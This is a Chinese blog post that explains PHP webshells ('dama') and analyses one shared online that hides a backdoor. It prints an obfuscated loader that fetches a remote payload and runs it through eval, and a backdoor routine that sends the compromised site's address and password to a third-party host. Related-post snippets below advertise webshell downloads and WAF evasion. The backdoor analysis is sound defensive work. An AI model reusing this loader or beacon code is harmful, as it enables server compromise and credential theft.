php大马程序_php大马是什么

最新推荐文章于 2023-08-29 19:55:21 发布
最新推荐文章于 2023-08-29 19:55:21 发布
阅读量943 收藏
点赞数 1
文章标签: php大马程序
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35406877/article/details/115094268
版权

大马:指木马病毒;php大马,就是php写的提取站点权限的程序;因为带有提权或者修改站点功能,所以称为叫木马。

673cc171e3372e302468e7dfc486d51a.png

有人分享了一个php大马(说是过waf),八成有后门,简单分析了一次 (推荐学习:PHP视频教程)<?php

$password='Shiqi';//登录密码(支持菜刀)

//----------功能程序------------------//

$c="chr";

session_start();

if(empty($_SESSION['PhpCode'])){

$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);

$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);

$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);

$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);

$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);

$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);

$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);

$get=chr(102).chr(105).chr(108).chr(101).chr(95);

$get.=chr(103).chr(101).chr(116).chr(95).chr(99);

$get.=chr(111).chr(110).chr(116).chr(101).chr(110);

$get.=chr(116).chr(115);

$_SESSION['PhpCode']=$get($url);}

$un=$c(103).$c(122).$c(105).$c(110);

$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx'));

@eval($un($_SESSION['PhpCode']));

?>

一共有三个变量,$url、$get、$un,首先对着几个变量ascii转成字符串,看看是什么,用echo输出即可。

c19541ecdf6b0a73ac58efdc562bddee.png

就是个简单的基于base64加gzinflate加密

后门部分:if(isset($_GET['login'])=='geturl'){

@set_time_limit(10);

$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];

$serverp = envlpass;

$copyurl = base64_decode('SFRUUDovL1dXVy5GQUNFQjBPSy5DQy9lcnJvci5waHA/bmFtZT0=');

$url=$copyurl.$serveru.'&pass='.$serverp;

$url=urldecode($url);

GetHtml($url);

}

function geturl(){

@set_time_limit(10);

$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];

$serverp = envlpass;

$copyurl = base64_decode('');

$url=$copyurl.$serveru.'&p='.$serverp;

$url=urldecode($url);

GetHtml($url);

}

温哥华小文青
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实战分析PHP大马隐藏后门(案例一)的-PHP大马
07-07
实战分析PHP大马隐藏后门(案例一)的-PHP大马
PHP大马】定义、下载、使用、源码
热门推荐
06-01 2万+
PHP大马】适合第一次接触的
PHP大马后门分析
qq_17754023的博客
02-28 3892
PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能。网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就是当你上传木马到别人的服务器上的时候,该大马的制作者同样会通过后门获得服务器的权限。今天就来分析一波该大马中的后门。 分析大马文件 打开下载的php大马,可以看出该大马是经过加密了的。 加密不用说,一看就是有后门 从源码开头可以看见 eval(gzinflate(base64_decode(" base64+gzin..
php解析的过程,一个PHP后门的分析过程
weixin_29882269的博客
03-09 165
$password='123';//----------功能程序------------------//$c="chr";//字符串session_start();if(empty($_SESSION['PhpCode'])){$url.=$c(104).$c(116).$c(116).$c(112).$c(58);$url.=$c(47).$c(47).$c(104).$c(106).$c(10...
php大马的使用教程,一php大马,值得研究
weixin_29057237的博客
04-12 1203
#--Config--#$login_password= '123456'; //这是密码#----------#error_reporting(E_ALL);set_time_limit(0);ini_set("max_execution_time","0");ini_set("memory_limit","9999M");set_magic_quotes_runtime(0);if(!isse...
sql_大马_sql_脱裤_php大马下载_php大马_
10-01
php脱裤大马,需要的就下载吧!!!!!!!!!!!!!!
php.rar_php大马_大马
09-21
php 大马,需要的可以 看看的.php 大马,需要的可以 看看的php 大马,需要的可以 看看的
最新过狗过盾云锁百度云大马_大马_php过狗马_最新过狗过盾云锁百度云大马_
10-03
最新过狗过盾云锁百度云大马 簡單實用 建議下載
BestShell:世界上最好用的php大马
03-09
请勿用作非法用途! 具体介绍: ://yzddmr6.tk/2019/09/01/BestShell/ 代码开源排除后门,免杀自己做。 4.0更新日志 修复php7.0之后将不再支持与类名相同的构造方法的问题,支持php所有...从其他大马里移植了顶部函数
PHP大马过狗代码.php
05-31
该文件为PHP代码的大马,通过该文件,可以很好的绕过安全狗的检测,进而链接服务器。相关链接为https://download.csdn.net/download/wychy2008/10318498
一句话php木马
weixin_63231007的博客
03-20 1561
1.什么是一句话木马? :一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 2.如何发送命令,执行命令? :我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ']接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。 所以看到的...
攻防演练中PHP免杀大马分析实战_afei00123
afei001
07-10 880
在一次HVV行动中,在某天眼设备上发现红队在尝试通过命令执行下载了一个可疑的txt文件。该文件经分析是一个不错的免杀PHP大马
PHP小马,大马实现分析编写
Love&Share
03-15 1万+
PHP工具开发 PHP小马 简单隐藏 登陆密码 实现写入文件 <?php $pass = '14e1b600b1fd579f47433b88e8d85291'; #123456 $get = $_GET['pass']; if (!empty($get)) { if (md5(md5($get))) { if (!empty($_POST)) { $path=$_POST['filepath']; $content=$_P
php超小免杀大马_PHP免杀大马的奇淫技巧
weixin_34150870的博客
02-28 2645
本文最后更新于可能会因为没有更新而失效。如已失效或需要修正,请留言!Part 1 Part 2大马后门检查: Fiddler 抓包 审计代码修改并运行脚本 Burp 抓包或者右键查看原代码 修改并运行代码 再使用 Burp 抓个包 查找关键字 GetHtml hmlogin localhost 等 把上图的 base64 代码解密下 Part 3大马源码免杀这里我使用的是国外的一款大...
webshell大马(asp,jsp,php
最新发布
weixin_56537388的博客
08-29 810
可以在Windows Server虚拟机中搭建,具体的搭建步骤网上很多教程,这里不再赘述,这里主要演示asp大马的效果:上传asp大马,将大马放到IIS服务器的根目录。注意,要复现ASPX文件的大马,需要.NET环境,所以在搭建IIS服务器的时候,我们需要勾上上面的那些,使用大马:AspxSpy2014Final.aspx。需要搭建Tomcat环境,才能执行jsp文件。Tomcat环境配置教程网上有,也可以参考我这篇文章:Tomcat配置。登录之后,就可以看到功能界面了,这里演示cmd操作。
php木马问题
weixin_33910759的博客
01-18 121
为什么80%的码农都做不了架构师?>>> ...
php包含大马执行,对于某个PHP大马的分析
weixin_40008135的博客
03-09 173
阅读: 87 但是代码量却非常少: 不由得非常好奇它是如何用这么少的代码实现这么丰富的功能的。于是将它的 html 内容打印一下: 发现它的内容是gz压缩后再base64加密的: 于是反向执行一下,得到原始内容:error_reporting(0);session_start();if (!isset($_SESSION["phpapi"])) {$c = '';$useragent = 'Mo...
解密PHP大马
sievr的博客
12-05 1925
今晚晚自习闲得无聊,总得找个什么事来做,emmm…… 前几天意外得到了个大马,用了用感觉还不错,但就是特征太明显了。这大马基本上公开了,看见界面就知道密码,我肯定不服啊,就来解个码玩玩。 这是下载到的。 看着这一大段代码就头疼,啥都不管,直接扔网站里解密一波。 结果特么没一个行的,这个网站说是混淆加密,那个网站说是zend加密。气的我直接退出了。 既然网站解不了,那就只能手动解码了。 现在我才来...
php中表单是什么_PHP 表单
06-07
PHP 中,表单是一种用于收集用户信息和数据的 HTML 元素。PHP 表单通常包括表单标签、表单元素和提交按钮。表单标签定义了表单的名称和提交目标地址,表单元素是用户用于输入信息的各种表单字段,例如文本框、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值